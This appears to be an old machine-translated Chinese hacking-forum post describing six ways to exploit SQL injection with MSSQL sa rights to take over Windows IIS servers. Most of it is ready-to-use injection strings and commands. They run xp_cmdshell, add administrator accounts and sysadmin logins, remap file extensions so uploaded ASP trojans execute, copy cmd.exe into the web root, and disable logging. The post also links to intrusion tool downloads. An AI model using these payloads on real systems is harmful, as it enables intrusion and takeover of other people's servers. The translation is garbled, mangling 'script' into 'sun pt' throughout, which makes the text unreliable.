Successful invasion of the MSSQL database of alternative ideas-vulnerability warning-the black bar safety net

2005-11-07T00:00:00
ID MYHACK58:6220054342
Type myhack58
Reporter 佚名
Modified 2005-11-07T00:00:00

Description

mssql injection of sa use

Database and website put in the same server:

Method a:

Open TS, add accounts on the go, the specific statement is as follows:

;exec master. dbo. xp_cmdshell '@echo [Components] > c:\sql' ;exec master. dbo. xp_cmdshell '@echo TSEnable = on >> c:\sql' ;exec master. dbo. xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' ;exec master. dbo. xp_cmdshell '@del C:\server'

Exec Master..Xp_CmdShell 'net user linzi 1 2 3 /add'

Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'

Method two:

With asp. the dll parses the jpg format, and then through the upload point, legitimate Upload a asp Trojan, mainly using the Adsutil. vbs

The script to achieve.

The specific statement is: csc sun pt C:\Inetpub\AdminSc 太阳 pts\adsutil.vbs ENUM w3svc/3/root to get its directory csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/3/Root/Sc sun ptMaps ". jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ". asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ". aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"

Method three:

Add a system permission of the user, and then use Query Analyzer to connect up

Specific statement:

;exec master. dbo. sp_addlogin linzi;--

;exec master. dbo. sp_password null,linzi,linzi;--

;exec master. dbo. sp_addsrvrolemember linzi sysadmin;--

Method four:

The old hole the new. The construction of the original U vulnerability, and then with a small writing tool to connect up, upload

The specific statement is as follows:

;exec master. dbo. xp_cmdshell'copy c:\winnt\system32\cmd.exe c:\inetpub\sc 太阳 pts\linzi.exe'

Method five:

Use the Adsutil. vbs built a browse, write, execute, etc. permissions to the directory, and then upload

The specific statement is as follows:

csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir" csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/Path: "c:\" csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSc the sun pt 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessW sun te 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/Sc sun ptMaps ". asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ". aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG" csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1 csc sun pt c:\Inetpub\AdminSc 太阳 pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0

Then _http://ip/linzi/_aboard the go

Method six:

The storm path, and then, write a pony, or upload a Trojan, and then use the copy command to put the extension into asp

The specific statement is as follows:

  1. Storm directory:

;create table [dbo]. [linzi] ([daya]char);--

;DECLARE @result varchar(2 5 5) EXEC master. dbo. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into linzi (daya) values(@result);--

and 1=(select top 1 daya from linzi)

  1. Picture renamed

copy the image path+linzi.jpg the image path+linzi. asp Surface of the six methods, can say is the more effective of the six, of course, for sa's invasion methods varied, my personal is frequently used above a few kinds, because of the above Several methods, for most of the sites have enough, well, time to continue to write to the database is not placed in the same server of the attack method. Tired Ah!~~~ Detailed look at I made a few animations, I personally commonly used method is to first open the Terminal Service, and then write down. vbs,then upload a port forwarding tool, such as htran, the forwarding to the public network, directly landing, the animation in there.

Animation download: http://www. cnbct. org/bbs/dispbbs. asp? boardID=5&ID=5 2&page=1

The second method, see the discussion place

Port forwarding intrusion within the network: http://www.cnbct.org/VIP-DOWN/ 入侵 内 网 .rar U vulnerability new: http://www. cnbct. org/VIP-DOWN/sa-up. rar